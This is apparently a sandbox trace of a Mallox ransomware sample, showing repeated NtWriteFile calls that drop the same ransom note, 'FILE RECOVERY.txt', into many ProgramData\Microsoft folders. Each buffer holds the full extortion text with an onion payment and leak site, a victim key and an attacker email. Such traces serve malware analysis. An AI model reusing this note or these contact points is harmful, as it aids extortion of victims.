NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000250 filepath: C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001b8 filepath: C:\ProgramData\Microsoft\Crypto\RSA\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001b8 filepath: C:\ProgramData\Microsoft\Crypto\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000394 filepath: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000003cc filepath: C:\ProgramData\Microsoft\Device Stage\Device\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000034c filepath: C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000034c filepath: C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ko-KR\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000034c filepath: C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000034c filepath: C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ko-KR\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\Device Stage\Task\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\Device Stage\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001b8 filepath: C:\ProgramData\Microsoft\DeviceSync\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000034c filepath: C:\ProgramData\Microsoft\DRM\Server\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000394 filepath: C:\ProgramData\Microsoft\DRM\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\Event Viewer\Views\ApplicationViewsRootNode\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001b8 filepath: C:\ProgramData\Microsoft\Event Viewer\Views\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000034c filepath: C:\ProgramData\Microsoft\Event Viewer\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002c0 filepath: C:\ProgramData\Microsoft\HTML Help\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001b8 filepath: C:\ProgramData\Microsoft\IdentityCRL\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000034c filepath: C:\ProgramData\Microsoft\IlsCache\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System\Support\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000015c filepath: C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000015c filepath: C:\ProgramData\Microsoft\Microsoft Antimalware\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002c0 filepath: C:\ProgramData\Microsoft\Network\Connections\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002c0 filepath: C:\ProgramData\Microsoft\Network\Downloader\FILE RECOVERY.txt	1
